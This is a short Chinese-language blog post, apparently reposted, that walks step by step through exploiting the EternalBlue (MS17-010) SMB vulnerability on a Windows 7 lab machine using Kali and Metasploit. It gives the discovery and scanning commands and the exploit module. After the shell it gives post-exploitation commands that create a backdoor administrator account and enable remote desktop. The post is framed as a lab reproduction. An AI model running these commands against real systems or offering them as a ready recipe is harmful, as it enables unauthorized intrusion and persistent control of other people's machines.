永恆之藍漏洞(445端口)詳細利用過程


永恆之藍(445端口)完整利用過程

     前幾天有一次比賽的時候接觸到了永恆之藍漏洞,之前也沒復現過永恆之藍漏洞,在查資料方面花費了很多時間,就想着寫篇博客記錄一下。

前置環境:

​ kali,win7虛擬機,msf(kali自帶)

一 · 掃描網絡中存活主機

使用命令:

netdiscover -i eth0 -r 192.168.1.1/24

PS:由於這里使用的是虛擬機,所以網卡顯示為 VMware

二 · 掃描當前主機存活端口

使用命令:

nmap -sV -n 192.168.1.1

三 · 開啟MSF並利用搜索並檢測是否能利用永恆之藍

開啟MSF:

msfconsole

檢測永恆之藍是否能利用 :

search ms17-010

use auxiliary/scanner/smb/smb_ms17_010

set RHOST 192.168.1.2

經過檢測可以發現永恆之藍漏洞可以利用

四 · 利用永恆之藍漏洞

use exploit/windows/smb/ms17_010_eternalblue

剩下的命令不再做文本解釋

成功獲得shell

=================================================================

so,獲得shell之后應該做什么呢???

新建一個用戶,以便下次訪問。並將該用戶升為管理員權限,這樣就可以擁有更大的權限了

新建用戶並添加到管理員中

net user taotao 123 /add
net localgroup administrators taotao /add

查看是否成功操作

net user 查看本地用戶列表
net localgroup administrators

但是光有shell權限太不方便了,再開啟一個3389方便遠程連接

遠程連接之前需要判斷對方用戶在不在線

開啟遠程桌面服務

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM